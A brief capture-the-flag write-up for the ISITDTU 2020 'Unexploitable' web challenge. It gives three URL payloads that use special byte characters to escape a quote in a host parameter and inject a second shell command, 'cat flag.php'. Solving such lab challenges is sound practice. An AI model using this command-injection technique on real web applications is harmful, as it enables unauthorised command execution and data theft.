Tags: web powershell 

Rating:

# Solution for Unexploitable (ISITDTU 2020)

![image](./chall.png)

Just use special character to escapse quote
---

Break Permitted Here
http://13.68.153.110/unexploitable/?host=8.8.8.8%82;%20cat%20flag.php;%20%82
---

Private Use One
http://13.68.153.110/unexploitable/?host=8.8.8.8%91;%20cat%20flag.php;%20%91
---

Private Use Two
http://13.68.153.110/unexploitable/?host=8.8.8.8%92;%20cat%20flag.php;%20%92
---

![image](./show.png)

Original writeup (https://github.com/dinhbaouit/My-CTF-Challenge/blob/master/2020/ISITDTU-CTF-Quals/Unexploitable/readme.md).